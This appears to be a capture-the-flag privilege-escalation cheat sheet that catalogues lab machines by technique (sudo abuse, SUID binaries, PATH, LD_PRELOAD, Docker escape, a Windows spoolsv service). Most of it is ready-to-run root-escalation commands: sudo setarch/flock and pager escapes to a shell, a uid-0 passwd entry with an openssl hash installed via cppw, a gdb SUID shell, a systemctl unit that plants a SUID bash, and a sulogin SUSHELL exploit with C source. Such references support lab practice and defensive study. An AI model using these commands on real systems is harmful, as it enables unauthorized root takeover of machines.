The below is a modification from here!
Table of Contents LINUX
- Abusing Sudo Rights
- SUID Bit
- Writable /etc/passwd file
- Python Pickle
- Path Variable
- Docker Escape
- Writable files or script
- Environment Variable
Table of Contents WINDOWS
- Service
Abusing Sudo Rights ⤴
No. | Machine Name | Reference | Files/Binaries | Description |
---|---|---|---|---|
1. | PYEXP: 1 | Reference | Python script | exec function |
2. | BaseME | Reference | base64 | base64 to read id_rsa from /root/.ssh/id_rsa |
3. | five | Reference | man | man command, which uses less as its pager. |
4. | forbidden | EXTERNAL Reference | setarch | sudo setarch x86_64 /bin/sh |
5. | Vulny | EXTERNAL Reference | flock | sudo flock -u / /bin/sh |
6. | troya | Reference | insmod | Insert a kernel module as root for a reverse shell |
7. | Echoed | No Reference | xdg-open | 1. echo "HackMyVM.eu" > HackMyVM 2. sudo -u root /usr/bin/xdg-open /tmp/HackMyVM 3. When the pager prompt appears (e.g. WARNING: terminal is not fully functional /tmp/HackMyVM (press RETURN)), escape to a shell with !/bin/sh |
8. | Attack | No Reference | /usr/sbin/cppw | openssl passwd -1 pass123 (output: $1$GLppQ1Z2$VsR0VveK9V3l0Ata6WLCr1); then as kratos: cp /etc/passwd .; mv passwd passwd_backup; echo 'user3:$1$GLppQ1Z2$VsR0VveK9V3l0Ata6WLCr1:0:0::/root:/bin/bash' >> passwd_backup; sudo -u root /usr/sbin/cppw passwd_backup |
9. | Talk | Reference | lynx | sudo -u root /usr/bin/lynx, then press shift + 1 (!): "Spawning your default shell. Use 'exit' to return to Lynx." root@talk:/home/nona# whoami;id → root |
SUID Bit ⤴
No. | Machine Name | SUID Bit | Reference | Method |
---|---|---|---|---|
1 | ShellDredd #1 Hannah | cpulimit | Reference | cpulimit -l 50 -f cp /bin/bash /tmp/bash; cpulimit -l 50 -f chmod +s /tmp/bash; /tmp/bash -p |
2 | hackmyvm : connection | gdb | Reference | gdb -nx -ex 'python import os; os.execl("/bin/sh", "sh", "-p")' -ex quit |
3 | hackmyvm : soul | agetty | Reference | /sbin/agetty -o -p -l /bin/bash -a root tty |
4 | hackmyvm : Dominator | systemctl | Reference | Create /tmp/temp.service containing: [Service] Type=oneshot ExecStart=/bin/sh -c "cp /bin/bash /tmp/bash2 && chmod u+s /tmp/bash2" [Install] WantedBy=multi-user.target; then /usr/bin/systemctl link /tmp/temp.service; /usr/bin/systemctl enable --now /tmp/temp.service; /tmp/bash2 -p (whoami → root) |
5 | Locker | sulogin | Reference | Environment Variables (from the sulogin man page): sulogin looks for the environment variable SUSHELL or sushell to determine what shell to start. If the environment variable is not set, it will try to execute root's shell from /etc/passwd. If that fails it will fall back to /bin/sh. exp.c: int main() { setuid(0); setgid(0); system("/bin/bash -p"); } Then as www-data in /tmp: export SUSHELL=/tmp/exp; chmod 777 exp; /usr/sbin/sulogin -e; at "Press Enter for maintenance (or press Control-D to continue):" press Enter; whoami;id → root uid=0(root) gid=0(root) groups=0(root),33(www-data) |
Writable /etc/passwd file ⤴
No | Machine Name |
---|---|
1. | PYLINGTON1 |
Writable files or script ⤴
No | Machine Name |
---|---|
1. | suidy |
Python Pickle ⤴
No | Machine Name |
---|---|
1. | PHINEAS:1 |
Path Variable ⤴
No. | Machine Name | comments |
---|---|---|
1. | Hacksudo:search | install: missing file operand |
2. | hommie | cat: not absolute file path |
Docker Escape ⤴
No | Machine Name |
---|---|
1. | pwned |
Environment Variable ⤴
No. | Machine Name | comments |
---|---|---|
1. | icarus | LD_PRELOAD |
Service ⤴
No. | Machine Name | service exploit |
---|---|---|
1. | driver | spoolsv |